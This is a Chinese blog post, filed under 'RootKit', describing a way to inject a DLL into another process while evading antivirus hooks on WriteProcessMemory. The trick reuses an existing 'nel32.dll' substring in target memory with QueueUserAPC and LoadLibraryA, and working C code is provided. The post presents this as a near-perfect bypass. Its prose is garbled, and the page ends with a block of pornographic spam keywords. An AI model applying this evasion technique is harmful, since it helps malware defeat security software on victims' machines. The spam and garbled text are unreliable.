• <ins id="pjuwb"></ins>
    <blockquote id="pjuwb"><pre id="pjuwb"></pre></blockquote>
    <noscript id="pjuwb"></noscript>
          <sup id="pjuwb"><pre id="pjuwb"></pre></sup>
            <dd id="pjuwb"></dd>
            <abbr id="pjuwb"></abbr>

            S.l.e!ep.¢%

            像打了激速一樣,以四倍的速度運轉,開心的工作
            簡單、開放、平等的公司文化;尊重個性、自由與個人價值;
            posts - 1098, comments - 335, trackbacks - 0, articles - 1
              C++博客 :: 首頁 :: 新隨筆 :: 聯系 :: 聚合  :: 管理

            繞過主動防御的代碼Inject方法思考

            Posted on 2010-02-03 12:49 S.l.e!ep.¢% 閱讀(1072) 評論(0)  編輯 收藏 引用 所屬分類: RootKit
            殺軟都hook NtWriteVirtualMemoryNtUserSetWindowsHookAW、NtUserSetWindowsHookE防止代碼注入。

              關于代碼注入Ring3層有:

              l 遠程線程CreateRemoteThread

              l 消息鉤子SetWindowsHookEx

              l Ring3 APC QueueUserApc

              l 修改線程文SetContextThread

              其第三種傳入個param,但求這個param必須目標進程存空間,比較笨重,直接目標進程VirtualAllocEx存,然希望參數入這個存,使WriteProcessMemory函數,而這個函數被hook,所以殺軟容易攔截代碼注入行

              仔細想想,殺軟這種防御失敗!原因個param,攻擊完全沒有必做這么動作去目標進程存空間申存并存,思考以不WriteProcessMemory函數呢?反個合理param,并且這個param目標進程存空間即

              思考,原這么容易啊,哈哈!樂半天~~~

              舉個例子:假設這樣注入

              QueueUserAPC((PAPCFUNC)LoadLibraryA, hThread, (ULONG_PTR)param) ;

              想讓param個“xxx.dll”,就,而且求這個param目標進程存空間

              您想么?哈哈

              答案:直接目標進程搜索個這樣字符串“nel32.dll”就以啦!因“kernel32.dll” 這樣字符串定存,那么“kernel32.dll” 不樣,那就隨便使“nel32.dll”,或“el32.dll”,都啊!最往windows目錄面撂進入個nel32.dll,這樣注入部分殺軟都不能攔截!哈哈!

              段程序,做個試驗,僅測試趨勢,完美繞過!其實殺軟稍測試。。。

            DWORD EnumThreadandInjectDll(char *processName,HANDLE hProcess, DWORD dwProcessID,TIDLIST *pThreadIdList)
            {
            TIDLIST *pCurrentTid = pThreadIdList ;
            const char szInjectModName[] = "nel32.dll";
            DWORD dwLen = strlen(szInjectModName) ;
              
            //////////////////////////////////////////////////////////////////////////
            //不目標進程
            //直接目標進程搜索出 nel32.dll 這樣字符串 并注入
            //////////////////////////////////////////////////////////////////////////
            int bufflen=30000;
            char *buffer=(char *)malloc(sizeof(char)*bufflen);
            DWORD dwNumberOfBytesRead;
            DWORD defaultAddress;
            //獲得該進程基址
            HANDLE hSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPMODULE, dwProcessID) ;
            if(!hSnapshot)
            {
              printf("CreateToolhelp32Snapshot error!n");
              return 0;
            }
            MODULEENTRY32 me = { sizeof(me) };
              BOOL fOk =Module32First(hSnapshot,&me);
            if(!fOk)
            {
              printf("Module32First error!n");
              return 0;
            }
              for (; fOk; fOk = Module32Next(hSnapshot,&me))
              {
              printf("%s process module name = %sn",processName,me.szModule);
                // 得進程模塊基址
              if(stricmp(me.szModule,processName)==0)
              {
              defaultAddress=(DWORD)me.modBaseAddr;
              printf("%s process module base = 0x%08Xn",processName,defaultAddress);
              break;
              }
              }
            //搜索
            if(!ReadProcessMemory(hProcess,(LPCVOID)defaultAddress,buffer,bufflen,&dwNumberOfBytesRead))
            {
              printf("ReadProcessMemory error!n");
              return 0;
            }
            for(int i=0;i<bufflen-dwLen;i++)
            {
              if(strnicmp(buffer+i,szInjectModName,dwLen)==0)
              {
              printf("found nel32.dll already!... %sn",buffer+i);
              while (pCurrentTid)
              {
               HANDLE hThread = OpenThread(THREAD_ALL_ACCESS, FALSE, pCurrentTid->dwTid) ;
              
               if (hThread != NULL)
               {
               //
               // 注入DLL指定進程
               //
               QueueUserAPC((PAPCFUNC)LoadLibraryA, hThread, (ULONG_PTR)(defaultAddress+i)) ;
               }
              
               printf("TID:%dn", pCurrentTid->dwTid) ;
               pCurrentTid = pCurrentTid->pNext ;
              }
              break;
              }
            }
              
            return 0 ;
            }

            精品久久久久久久久中文字幕| 亚洲国产成人久久综合一区77| 99久久精品免费看国产一区二区三区| 欧美精品丝袜久久久中文字幕| 污污内射久久一区二区欧美日韩 | 国产精品久久久久久久app| 日韩美女18网站久久精品| 久久久久久国产精品美女| 久久成人国产精品| 久久久久久av无码免费看大片| 亚洲精品午夜国产VA久久成人| 久久精品国产99国产精偷| 无码国内精品久久人妻麻豆按摩| 亚洲中文字幕无码久久精品1| 日本久久久久久中文字幕| 久久精品国产日本波多野结衣| 99麻豆久久久国产精品免费| 香蕉99久久国产综合精品宅男自| 国产精品99久久免费观看| 亚洲精品高清一二区久久| 一级做a爱片久久毛片| 伊人久久无码中文字幕| 久久夜色精品国产亚洲av| 久久精品国产亚洲一区二区| 777午夜精品久久av蜜臀| 色婷婷久久综合中文久久一本| 日韩亚洲欧美久久久www综合网 | 久久精品久久久久观看99水蜜桃| 观看 国产综合久久久久鬼色 欧美 亚洲 一区二区 | 亚洲国产成人久久综合区| 88久久精品无码一区二区毛片 | 久久天天躁狠狠躁夜夜2020老熟妇| 久久天天躁狠狠躁夜夜avapp | 免费精品久久天干天干| 久久国产成人| 久久93精品国产91久久综合| 久久久久免费精品国产| 91久久福利国产成人精品| 久久香蕉一级毛片| 91亚洲国产成人久久精品| 国产精品VIDEOSSEX久久发布|